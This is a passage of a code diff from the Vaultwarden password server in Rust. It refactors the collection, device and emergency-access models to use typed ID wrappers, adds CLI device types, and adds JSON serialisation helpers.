|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_collection(collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for collection in CollectionUser::find_by_collection(collection_uuid, conn).await.iter() {
|
for collection in CollectionUser::find_by_collection(collection_uuid, conn).await.iter() {
|
||||||
User::update_uuid_revision(&collection.user_uuid, conn).await;
|
User::update_uuid_revision(&collection.user_uuid, conn).await;
|
||||||
}
|
}
|
||||||
@@ -629,12 +744,16 @@ impl CollectionUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user_and_org(user_uuid: &str, org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user_and_org(
|
||||||
|
user_uuid: &UserId,
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> EmptyResult {
|
||||||
let collectionusers = Self::find_by_organization_and_user_uuid(org_uuid, user_uuid, conn).await;
|
let collectionusers = Self::find_by_organization_and_user_uuid(org_uuid, user_uuid, conn).await;
|
||||||
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
for user in collectionusers {
|
for user in collectionusers {
|
||||||
diesel::delete(users_collections::table.filter(
|
let _: () = diesel::delete(users_collections::table.filter(
|
||||||
users_collections::user_uuid.eq(user_uuid)
|
users_collections::user_uuid.eq(user_uuid)
|
||||||
.and(users_collections::collection_uuid.eq(user.collection_uuid))
|
.and(users_collections::collection_uuid.eq(user.collection_uuid))
|
||||||
))
|
))
|
||||||
@@ -644,11 +763,19 @@ impl CollectionUser {
|
|||||||
Ok(())
|
Ok(())
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn has_access_to_collection_by_user(
|
||||||
|
col_id: &CollectionId,
|
||||||
|
user_uuid: &UserId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> bool {
|
||||||
|
Self::find_by_collection_and_user(col_id, user_uuid, conn).await.is_some()
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
impl CollectionCipher {
|
impl CollectionCipher {
|
||||||
pub async fn save(cipher_uuid: &str, collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn save(cipher_uuid: &CipherId, collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
Self::update_users_revision(collection_uuid, conn).await;
|
Self::update_users_revision(collection_uuid, conn).await;
|
||||||
|
|
||||||
db_run! { conn:
|
db_run! { conn:
|
||||||
@@ -678,7 +805,7 @@ impl CollectionCipher {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete(cipher_uuid: &str, collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete(cipher_uuid: &CipherId, collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
Self::update_users_revision(collection_uuid, conn).await;
|
Self::update_users_revision(collection_uuid, conn).await;
|
||||||
|
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
@@ -692,7 +819,7 @@ impl CollectionCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(ciphers_collections::table.filter(ciphers_collections::cipher_uuid.eq(cipher_uuid)))
|
diesel::delete(ciphers_collections::table.filter(ciphers_collections::cipher_uuid.eq(cipher_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -700,7 +827,7 @@ impl CollectionCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_collection(collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(ciphers_collections::table.filter(ciphers_collections::collection_uuid.eq(collection_uuid)))
|
diesel::delete(ciphers_collections::table.filter(ciphers_collections::collection_uuid.eq(collection_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -708,9 +835,63 @@ impl CollectionCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn update_users_revision(collection_uuid: &str, conn: &mut DbConn) {
|
pub async fn update_users_revision(collection_uuid: &CollectionId, conn: &mut DbConn) {
|
||||||
if let Some(collection) = Collection::find_by_uuid(collection_uuid, conn).await {
|
if let Some(collection) = Collection::find_by_uuid(collection_uuid, conn).await {
|
||||||
collection.update_users_revision(conn).await;
|
collection.update_users_revision(conn).await;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Added in case we need the membership_uuid instead of the user_uuid
|
||||||
|
pub struct CollectionMembership {
|
||||||
|
pub membership_uuid: MembershipId,
|
||||||
|
pub collection_uuid: CollectionId,
|
||||||
|
pub read_only: bool,
|
||||||
|
pub hide_passwords: bool,
|
||||||
|
pub manage: bool,
|
||||||
|
}
|
||||||
|
|
||||||
|
impl CollectionMembership {
|
||||||
|
pub fn to_json_details_for_member(&self, membership_type: i32) -> Value {
|
||||||
|
json!({
|
||||||
|
"id": self.membership_uuid,
|
||||||
|
"readOnly": self.read_only,
|
||||||
|
"hidePasswords": self.hide_passwords,
|
||||||
|
"manage": membership_type >= MembershipType::Admin
|
||||||
|
|| self.manage
|
||||||
|
|| (membership_type == MembershipType::Manager
|
||||||
|
&& !self.read_only
|
||||||
|
&& !self.hide_passwords),
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
impl From<CollectionUser> for CollectionMembership {
|
||||||
|
fn from(c: CollectionUser) -> Self {
|
||||||
|
Self {
|
||||||
|
membership_uuid: c.user_uuid.to_string().into(),
|
||||||
|
collection_uuid: c.collection_uuid,
|
||||||
|
read_only: c.read_only,
|
||||||
|
hide_passwords: c.hide_passwords,
|
||||||
|
manage: c.manage,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
pub struct CollectionId(String);
|
||||||
|
|||||||
@@ -1,7 +1,14 @@
|
|||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
|
use derive_more::{Display, From};
|
||||||
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::{crypto, CONFIG};
|
use super::{AuthRequest, UserId};
|
||||||
use core::fmt;
|
use crate::{
|
||||||
|
crypto,
|
||||||
|
util::{format_date, get_uuid},
|
||||||
|
CONFIG,
|
||||||
|
};
|
||||||
|
use macros::{IdFromParam, UuidFromParam};
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
@@ -9,26 +16,25 @@ db_object! {
|
|||||||
#[diesel(treat_none_as_null = true)]
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid, user_uuid))]
|
#[diesel(primary_key(uuid, user_uuid))]
|
||||||
pub struct Device {
|
pub struct Device {
|
||||||
pub uuid: String,
|
pub uuid: DeviceId,
|
||||||
pub created_at: NaiveDateTime,
|
pub created_at: NaiveDateTime,
|
||||||
pub updated_at: NaiveDateTime,
|
pub updated_at: NaiveDateTime,
|
||||||
|
|
||||||
pub user_uuid: String,
|
pub user_uuid: UserId,
|
||||||
|
|
||||||
pub name: String,
|
pub name: String,
|
||||||
pub atype: i32, // https://github.com/bitwarden/server/blob/master/src/Core/Enums/DeviceType.cs
|
pub atype: i32, // https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/Enums/DeviceType.cs
|
||||||
pub push_uuid: Option<String>,
|
pub push_uuid: Option<PushId>,
|
||||||
pub push_token: Option<String>,
|
pub push_token: Option<String>,
|
||||||
|
|
||||||
pub refresh_token: String,
|
pub refresh_token: String,
|
||||||
|
|
||||||
pub twofactor_remember: Option<String>,
|
pub twofactor_remember: Option<String>,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl Device {
|
impl Device {
|
||||||
pub fn new(uuid: String, user_uuid: String, name: String, atype: i32) -> Self {
|
pub fn new(uuid: DeviceId, user_uuid: UserId, name: String, atype: i32) -> Self {
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
@@ -40,13 +46,25 @@ impl Device {
|
|||||||
name,
|
name,
|
||||||
atype,
|
atype,
|
||||||
|
|
||||||
push_uuid: None,
|
push_uuid: Some(PushId(get_uuid())),
|
||||||
push_token: None,
|
push_token: None,
|
||||||
refresh_token: String::new(),
|
refresh_token: String::new(),
|
||||||
twofactor_remember: None,
|
twofactor_remember: None,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub fn to_json(&self) -> Value {
|
||||||
|
json!({
|
||||||
|
"id": self.uuid,
|
||||||
|
"name": self.name,
|
||||||
|
"type": self.atype,
|
||||||
|
"identifier": self.uuid,
|
||||||
|
"creationDate": format_date(&self.created_at),
|
||||||
|
"isTrusted": false,
|
||||||
|
"object":"device"
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
pub fn refresh_twofactor_remember(&mut self) -> String {
|
pub fn refresh_twofactor_remember(&mut self) -> String {
|
||||||
use data_encoding::BASE64;
|
use data_encoding::BASE64;
|
||||||
let twofactor_remember = crypto::encode_random_bytes::<180>(BASE64);
|
let twofactor_remember = crypto::encode_random_bytes::<180>(BASE64);
|
||||||
@@ -59,7 +77,12 @@ impl Device {
|
|||||||
self.twofactor_remember = None;
|
self.twofactor_remember = None;
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn refresh_tokens(&mut self, user: &super::User, scope: Vec<String>) -> (String, i64) {
|
pub fn refresh_tokens(
|
||||||
|
&mut self,
|
||||||
|
user: &super::User,
|
||||||
|
scope: Vec<String>,
|
||||||
|
client_id: Option<String>,
|
||||||
|
) -> (String, i64) {
|
||||||
// If there is no refresh token, we create one
|
// If there is no refresh token, we create one
|
||||||
if self.refresh_token.is_empty() {
|
if self.refresh_token.is_empty() {
|
||||||
use data_encoding::BASE64URL;
|
use data_encoding::BASE64URL;
|
||||||
@@ -67,20 +90,25 @@ impl Device {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Update the expiration of the device and the last update date
|
// Update the expiration of the device and the last update date
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
self.updated_at = time_now;
|
self.updated_at = time_now.naive_utc();
|
||||||
|
|
||||||
|
// Generate a random push_uuid so if it doesn't already have one
|
||||||
|
if self.push_uuid.is_none() {
|
||||||
|
self.push_uuid = Some(PushId(get_uuid()));
|
||||||
|
}
|
||||||
|
|
||||||
// ---
|
// ---
|
||||||
// Disabled these keys to be added to the JWT since they could cause the JWT to get too large
|
// Disabled these keys to be added to the JWT since they could cause the JWT to get too large
|
||||||
// Also These key/value pairs are not used anywhere by either Vaultwarden or Bitwarden Clients
|
// Also These key/value pairs are not used anywhere by either Vaultwarden or Bitwarden Clients
|
||||||
// Because these might get used in the future, and they are added by the Bitwarden Server, lets keep it, but then commented out
|
// Because these might get used in the future, and they are added by the Bitwarden Server, lets keep it, but then commented out
|
||||||
// ---
|
// ---
|
||||||
// fn arg: orgs: Vec<super::UserOrganization>,
|
// fn arg: members: Vec<super::Membership>,
|
||||||
// ---
|
// ---
|
||||||
// let orgowner: Vec<_> = orgs.iter().filter(|o| o.atype == 0).map(|o| o.org_uuid.clone()).collect();
|
// let orgowner: Vec<_> = members.iter().filter(|m| m.atype == 0).map(|o| o.org_uuid.clone()).collect();
|
||||||
// let orgadmin: Vec<_> = orgs.iter().filter(|o| o.atype == 1).map(|o| o.org_uuid.clone()).collect();
|
// let orgadmin: Vec<_> = members.iter().filter(|m| m.atype == 1).map(|o| o.org_uuid.clone()).collect();
|
||||||
// let orguser: Vec<_> = orgs.iter().filter(|o| o.atype == 2).map(|o| o.org_uuid.clone()).collect();
|
// let orguser: Vec<_> = members.iter().filter(|m| m.atype == 2).map(|o| o.org_uuid.clone()).collect();
|
||||||
// let orgmanager: Vec<_> = orgs.iter().filter(|o| o.atype == 3).map(|o| o.org_uuid.clone()).collect();
|
// let orgmanager: Vec<_> = members.iter().filter(|m| m.atype == 3).map(|o| o.org_uuid.clone()).collect();
|
||||||
|
|
||||||
// Create the JWT claims struct, to send to the client
|
// Create the JWT claims struct, to send to the client
|
||||||
use crate::auth::{encode_jwt, LoginJwtClaims, DEFAULT_VALIDITY, JWT_LOGIN_ISSUER};
|
use crate::auth::{encode_jwt, LoginJwtClaims, DEFAULT_VALIDITY, JWT_LOGIN_ISSUER};
|
||||||
@@ -107,6 +135,8 @@ impl Device {
|
|||||||
// orgmanager,
|
// orgmanager,
|
||||||
sstamp: user.security_stamp.clone(),
|
sstamp: user.security_stamp.clone(),
|
||||||
device: self.uuid.clone(),
|
device: self.uuid.clone(),
|
||||||
|
devicetype: DeviceType::from_i32(self.atype).to_string(),
|
||||||
|
client_id: client_id.unwrap_or("undefined".to_string()),
|
||||||
scope,
|
scope,
|
||||||
amr: vec!["Application".into()],
|
amr: vec!["Application".into()],
|
||||||
};
|
};
|
||||||
@@ -118,11 +148,43 @@ impl Device {
|
|||||||
matches!(DeviceType::from_i32(self.atype), DeviceType::Android | DeviceType::Ios)
|
matches!(DeviceType::from_i32(self.atype), DeviceType::Android | DeviceType::Ios)
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn is_registered(&self) -> bool {
|
pub fn is_cli(&self) -> bool {
|
||||||
self.push_uuid.is_some()
|
matches!(DeviceType::from_i32(self.atype), DeviceType::WindowsCLI | DeviceType::MacOsCLI | DeviceType::LinuxCLI)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub struct DeviceWithAuthRequest {
|
||||||
|
pub device: Device,
|
||||||
|
pub pending_auth_request: Option<AuthRequest>,
|
||||||
|
}
|
||||||
|
|
||||||
|
impl DeviceWithAuthRequest {
|
||||||
|
pub fn to_json(&self) -> Value {
|
||||||
|
let auth_request = match &self.pending_auth_request {
|
||||||
|
Some(auth_request) => auth_request.to_json_for_pending_device(),
|
||||||
|
None => Value::Null,
|
||||||
|
};
|
||||||
|
json!({
|
||||||
|
"id": self.device.uuid,
|
||||||
|
"name": self.device.name,
|
||||||
|
"type": self.device.atype,
|
||||||
|
"identifier": self.device.uuid,
|
||||||
|
"creationDate": format_date(&self.device.created_at),
|
||||||
|
"devicePendingAuthRequest": auth_request,
|
||||||
|
"isTrusted": false,
|
||||||
|
"encryptedPublicKey": null,
|
||||||
|
"encryptedUserKey": null,
|
||||||
|
"object": "device",
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
pub fn from(c: Device, a: Option<AuthRequest>) -> Self {
|
||||||
|
Self {
|
||||||
|
device: c,
|
||||||
|
pending_auth_request: a,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
use crate::db::DbConn;
|
use crate::db::DbConn;
|
||||||
|
|
||||||
use crate::api::EmptyResult;
|
use crate::api::EmptyResult;
|
||||||
@@ -150,7 +212,7 @@ impl Device {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(devices::table.filter(devices::user_uuid.eq(user_uuid)))
|
diesel::delete(devices::table.filter(devices::user_uuid.eq(user_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -158,7 +220,7 @@ impl Device {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid_and_user(uuid: &str, user_uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid_and_user(uuid: &DeviceId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
devices::table
|
devices::table
|
||||||
.filter(devices::uuid.eq(uuid))
|
.filter(devices::uuid.eq(uuid))
|
||||||
@@ -169,7 +231,17 @@ impl Device {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_with_auth_request_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<DeviceWithAuthRequest> {
|
||||||
|
let devices = Self::find_by_user(user_uuid, conn).await;
|
||||||
|
let mut result = Vec::new();
|
||||||
|
for device in devices {
|
||||||
|
let auth_request = AuthRequest::find_by_user_and_requested_device(user_uuid, &device.uuid, conn).await;
|
||||||
|
result.push(DeviceWithAuthRequest::from(device, auth_request));
|
||||||
|
}
|
||||||
|
result
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
devices::table
|
devices::table
|
||||||
.filter(devices::user_uuid.eq(user_uuid))
|
.filter(devices::user_uuid.eq(user_uuid))
|
||||||
@@ -179,7 +251,7 @@ impl Device {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid(uuid: &DeviceId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
devices::table
|
devices::table
|
||||||
.filter(devices::uuid.eq(uuid))
|
.filter(devices::uuid.eq(uuid))
|
||||||
@@ -189,7 +261,7 @@ impl Device {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn clear_push_token_by_uuid(uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn clear_push_token_by_uuid(uuid: &DeviceId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::update(devices::table)
|
diesel::update(devices::table)
|
||||||
.filter(devices::uuid.eq(uuid))
|
.filter(devices::uuid.eq(uuid))
|
||||||
@@ -208,7 +280,7 @@ impl Device {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_latest_active_by_user(user_uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_latest_active_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
devices::table
|
devices::table
|
||||||
.filter(devices::user_uuid.eq(user_uuid))
|
.filter(devices::user_uuid.eq(user_uuid))
|
||||||
@@ -219,7 +291,7 @@ impl Device {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_push_devices_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_push_devices_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
devices::table
|
devices::table
|
||||||
.filter(devices::user_uuid.eq(user_uuid))
|
.filter(devices::user_uuid.eq(user_uuid))
|
||||||
@@ -230,7 +302,7 @@ impl Device {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn check_user_has_push_device(user_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn check_user_has_push_device(user_uuid: &UserId, conn: &mut DbConn) -> bool {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
devices::table
|
devices::table
|
||||||
.filter(devices::user_uuid.eq(user_uuid))
|
.filter(devices::user_uuid.eq(user_uuid))
|
||||||
@@ -243,60 +315,60 @@ impl Device {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Display)]
|
||||||
pub enum DeviceType {
|
pub enum DeviceType {
|
||||||
|
#[display("Android")]
|
||||||
Android = 0,
|
Android = 0,
|
||||||
|
#[display("iOS")]
|
||||||
Ios = 1,
|
Ios = 1,
|
||||||
|
#[display("Chrome Extension")]
|
||||||
ChromeExtension = 2,
|
ChromeExtension = 2,
|
||||||
|
#[display("Firefox Extension")]
|
||||||
FirefoxExtension = 3,
|
FirefoxExtension = 3,
|
||||||
|
#[display("Opera Extension")]
|
||||||
OperaExtension = 4,
|
OperaExtension = 4,
|
||||||
|
#[display("Edge Extension")]
|
||||||
EdgeExtension = 5,
|
EdgeExtension = 5,
|
||||||
|
#[display("Windows")]
|
||||||
WindowsDesktop = 6,
|
WindowsDesktop = 6,
|
||||||
|
#[display("macOS")]
|
||||||
MacOsDesktop = 7,
|
MacOsDesktop = 7,
|
||||||
|
#[display("Linux")]
|
||||||
LinuxDesktop = 8,
|
LinuxDesktop = 8,
|
||||||
|
#[display("Chrome")]
|
||||||
ChromeBrowser = 9,
|
ChromeBrowser = 9,
|
||||||
|
#[display("Firefox")]
|
||||||
FirefoxBrowser = 10,
|
FirefoxBrowser = 10,
|
||||||
|
#[display("Opera")]
|
||||||
OperaBrowser = 11,
|
OperaBrowser = 11,
|
||||||
|
#[display("Edge")]
|
||||||
EdgeBrowser = 12,
|
EdgeBrowser = 12,
|
||||||
|
#[display("Internet Explorer")]
|
||||||
IEBrowser = 13,
|
IEBrowser = 13,
|
||||||
|
#[display("Unknown Browser")]
|
||||||
UnknownBrowser = 14,
|
UnknownBrowser = 14,
|
||||||
|
#[display("Android")]
|
||||||
AndroidAmazon = 15,
|
AndroidAmazon = 15,
|
||||||
|
#[display("UWP")]
|
||||||
Uwp = 16,
|
Uwp = 16,
|
||||||
|
#[display("Safari")]
|
||||||
SafariBrowser = 17,
|
SafariBrowser = 17,
|
||||||
|
#[display("Vivaldi")]
|
||||||
VivaldiBrowser = 18,
|
VivaldiBrowser = 18,
|
||||||
|
#[display("Vivaldi Extension")]
|
||||||
VivaldiExtension = 19,
|
VivaldiExtension = 19,
|
||||||
|
#[display("Safari Extension")]
|
||||||
SafariExtension = 20,
|
SafariExtension = 20,
|
||||||
|
#[display("SDK")]
|
||||||
Sdk = 21,
|
Sdk = 21,
|
||||||
|
#[display("Server")]
|
||||||
Server = 22,
|
Server = 22,
|
||||||
}
|
#[display("Windows CLI")]
|
||||||
|
WindowsCLI = 23,
|
||||||
impl fmt::Display for DeviceType {
|
#[display("macOS CLI")]
|
||||||
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
|
MacOsCLI = 24,
|
||||||
match self {
|
#[display("Linux CLI")]
|
||||||
DeviceType::Android => write!(f, "Android"),
|
LinuxCLI = 25,
|
||||||
DeviceType::Ios => write!(f, "iOS"),
|
|
||||||
DeviceType::ChromeExtension => write!(f, "Chrome Extension"),
|
|
||||||
DeviceType::FirefoxExtension => write!(f, "Firefox Extension"),
|
|
||||||
DeviceType::OperaExtension => write!(f, "Opera Extension"),
|
|
||||||
DeviceType::EdgeExtension => write!(f, "Edge Extension"),
|
|
||||||
DeviceType::WindowsDesktop => write!(f, "Windows Desktop"),
|
|
||||||
DeviceType::MacOsDesktop => write!(f, "MacOS Desktop"),
|
|
||||||
DeviceType::LinuxDesktop => write!(f, "Linux Desktop"),
|
|
||||||
DeviceType::ChromeBrowser => write!(f, "Chrome Browser"),
|
|
||||||
DeviceType::FirefoxBrowser => write!(f, "Firefox Browser"),
|
|
||||||
DeviceType::OperaBrowser => write!(f, "Opera Browser"),
|
|
||||||
DeviceType::EdgeBrowser => write!(f, "Edge Browser"),
|
|
||||||
DeviceType::IEBrowser => write!(f, "Internet Explorer"),
|
|
||||||
DeviceType::UnknownBrowser => write!(f, "Unknown Browser"),
|
|
||||||
DeviceType::AndroidAmazon => write!(f, "Android Amazon"),
|
|
||||||
DeviceType::Uwp => write!(f, "UWP"),
|
|
||||||
DeviceType::SafariBrowser => write!(f, "Safari Browser"),
|
|
||||||
DeviceType::VivaldiBrowser => write!(f, "Vivaldi Browser"),
|
|
||||||
DeviceType::VivaldiExtension => write!(f, "Vivaldi Extension"),
|
|
||||||
DeviceType::SafariExtension => write!(f, "Safari Extension"),
|
|
||||||
DeviceType::Sdk => write!(f, "SDK"),
|
|
||||||
DeviceType::Server => write!(f, "Server"),
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
impl DeviceType {
|
impl DeviceType {
|
||||||
@@ -325,7 +397,18 @@ impl DeviceType {
|
|||||||
20 => DeviceType::SafariExtension,
|
20 => DeviceType::SafariExtension,
|
||||||
21 => DeviceType::Sdk,
|
21 => DeviceType::Sdk,
|
||||||
22 => DeviceType::Server,
|
22 => DeviceType::Server,
|
||||||
|
23 => DeviceType::WindowsCLI,
|
||||||
|
24 => DeviceType::MacOsCLI,
|
||||||
|
25 => DeviceType::LinuxCLI,
|
||||||
_ => DeviceType::UnknownBrowser,
|
_ => DeviceType::UnknownBrowser,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone, Debug, DieselNewType, Display, From, FromForm, Hash, PartialEq, Eq, Serialize, Deserialize, IdFromParam,
|
||||||
|
)]
|
||||||
|
pub struct DeviceId(String);
|
||||||
|
|
||||||
|
#[derive(Clone, Debug, DieselNewType, Display, From, FromForm, Serialize, Deserialize, UuidFromParam)]
|
||||||
|
pub struct PushId(pub String);
|
||||||
|
|||||||
@@ -1,9 +1,10 @@
|
|||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
|
use derive_more::{AsRef, Deref, Display, From};
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
|
use super::{User, UserId};
|
||||||
use crate::{api::EmptyResult, db::DbConn, error::MapResult};
|
use crate::{api::EmptyResult, db::DbConn, error::MapResult};
|
||||||
|
use macros::UuidFromParam;
|
||||||
use super::User;
|
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
@@ -11,9 +12,9 @@ db_object! {
|
|||||||
#[diesel(treat_none_as_null = true)]
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct EmergencyAccess {
|
pub struct EmergencyAccess {
|
||||||
pub uuid: String,
|
pub uuid: EmergencyAccessId,
|
||||||
pub grantor_uuid: String,
|
pub grantor_uuid: UserId,
|
||||||
pub grantee_uuid: Option<String>,
|
pub grantee_uuid: Option<UserId>,
|
||||||
pub email: Option<String>,
|
pub email: Option<String>,
|
||||||
pub key_encrypted: Option<String>,
|
pub key_encrypted: Option<String>,
|
||||||
pub atype: i32, //EmergencyAccessType
|
pub atype: i32, //EmergencyAccessType
|
||||||
@@ -26,14 +27,14 @@ db_object! {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Local methods
|
// Local methods
|
||||||
|
|
||||||
impl EmergencyAccess {
|
impl EmergencyAccess {
|
||||||
pub fn new(grantor_uuid: String, email: String, status: i32, atype: i32, wait_time_days: i32) -> Self {
|
pub fn new(grantor_uuid: UserId, email: String, status: i32, atype: i32, wait_time_days: i32) -> Self {
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: EmergencyAccessId(crate::util::get_uuid()),
|
||||||
grantor_uuid,
|
grantor_uuid,
|
||||||
grantee_uuid: None,
|
grantee_uuid: None,
|
||||||
email: Some(email),
|
email: Some(email),
|
||||||
@@ -58,11 +59,11 @@ impl EmergencyAccess {
|
|||||||
|
|
||||||
pub fn to_json(&self) -> Value {
|
pub fn to_json(&self) -> Value {
|
||||||
json!({
|
json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"Status": self.status,
|
"status": self.status,
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
"WaitTimeDays": self.wait_time_days,
|
"waitTimeDays": self.wait_time_days,
|
||||||
"Object": "emergencyAccess",
|
"object": "emergencyAccess",
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -70,36 +71,45 @@ impl EmergencyAccess {
|
|||||||
let grantor_user = User::find_by_uuid(&self.grantor_uuid, conn).await.expect("Grantor user not found.");
|
